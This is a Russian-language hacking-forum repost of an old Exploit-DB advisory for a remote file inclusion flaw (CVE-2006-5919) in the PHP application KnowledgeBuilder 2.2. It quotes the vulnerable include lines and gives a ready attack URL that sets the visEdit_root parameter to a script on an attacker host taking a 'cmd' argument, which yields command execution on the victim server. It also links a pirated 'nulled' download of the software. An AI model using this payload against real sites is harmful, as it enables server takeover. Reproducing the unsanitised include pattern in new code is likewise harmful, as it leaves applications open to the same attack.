Exploit KnowledgeBuilder 2.2 - 'visEdit_root' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2364
Проверка EDB
  1. Пройдено
Автор
IGI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-5919
Дата публикации
2006-09-13
Код:
+--------------------------------------------------------------------
+
+  KnowledgeBuilder.v2.2.PHP.NULL-WDYL  Remote File Inclusion
+
+-------------------------------------------------------------------
+
+ Version ...........: KnowledgeBuilder.v2.2.PHP.NULL-WDYL
+ cms download ......: http://warez.gtasoft.ru/skripts/KnowledgeBuilder.v2.2.PHP.NULL-WDYL.zip
+ Class .............: Remote File Inclusion
+ Found by ..........: igi
+ Contact ...........: [email protected]
+
+--------------------------------------------------------------------
+--------------------------------------------------------------------

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<?php
// ================================================
// Main control class
// ================================================

include $visEdit_root.'config/visEdit_control.config.php';
include $visEdit_root.'class/toolbars.class.php';
include $visEdit_root.'class/lang.class.php';
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

----------------------------------------------------------------------------
------
http://www.victom.com/admin/e_data/visEdit_control.class.php?visEdit_root=http://yourevil.com/r0x.dat.txt?cmd
----------------------------------------------------------------------------
--------

# milw0rm.com [2006-09-13]
 
Источник
www.exploit-db.com

Похожие темы